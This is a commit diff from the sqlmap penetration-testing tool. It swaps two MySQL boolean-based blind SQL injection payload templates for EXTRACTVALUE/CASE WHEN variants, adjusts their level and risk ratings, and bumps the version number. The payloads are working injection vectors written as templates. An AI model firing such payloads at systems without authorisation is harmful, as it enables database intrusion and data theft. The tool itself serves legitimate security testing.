Implements #5585

2025-02-03 05:04:11 +03:00 · 2023-12-22 17:13:37 +01:00 · 2023-12-22 17:13:37 +01:00 · a13c1f2db1
commit a13c1f2db1
parent f176266e58
2 changed files with 14 additions and 14 deletions
--- a/data/xml/payloads/boolean_blind.xml
+++ b/data/xml/payloads/boolean_blind.xml
@ -484,18 +484,18 @@ Tag: <test>
    </test>

    <test>
-        <title>MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)</title>
+        <title>MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)</title>
        <stype>1</stype>
-        <level>5</level>
-        <risk>1</risk>
+        <level>1</level>
+        <risk>5</risk>
        <clause>1,2,3,8</clause>
        <where>1</where>
-        <vector>AND ([INFERENCE])*[RANDNUM]</vector>
+        <vector>AND EXTRACTVALUE([RANDNUM],CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 0x3A END)</vector>
        <request>
-            <payload>AND ([RANDNUM]=[RANDNUM])*[RANDNUM1]</payload>
+            <payload>AND EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 0x3A END)</payload>
        </request>
        <response>
-            <comparison>AND ([RANDNUM]=[RANDNUM1])*[RANDNUM1]</comparison>
+            <comparison>AND EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 0x3A END)</comparison>
        </response>
        <details>
            <dbms>MySQL</dbms>
@ -503,18 +503,18 @@ Tag: <test>
    </test>

    <test>
-        <title>MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)</title>
+        <title>MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)</title>
        <stype>1</stype>
-        <level>5</level>
-        <risk>3</risk>
-        <clause>1,2,3</clause>
+        <level>3</level>
+        <risk>5</risk>
+        <clause>1,2,3,8</clause>
        <where>2</where>
-        <vector>OR ([INFERENCE])*[RANDNUM]</vector>
+        <vector>OR EXTRACTVALUE([RANDNUM],CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 0x3A END)</vector>
        <request>
-            <payload>OR ([RANDNUM]=[RANDNUM])*[RANDNUM1]</payload>
+            <payload>OR EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 0x3A END)</payload>
        </request>
        <response>
-            <comparison>OR ([RANDNUM]=[RANDNUM1])*[RANDNUM1]</comparison>
+            <comparison>OR EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 0x3A END)</comparison>
        </response>
        <details>
            <dbms>MySQL</dbms>
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@ -20,7 +20,7 @@ from thirdparty import six
 from thirdparty.six import unichr as _unichr

 # sqlmap version (<major>.<minor>.<month>.<monthly commit>)
-VERSION = "1.7.12.7"
+VERSION = "1.7.12.8"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)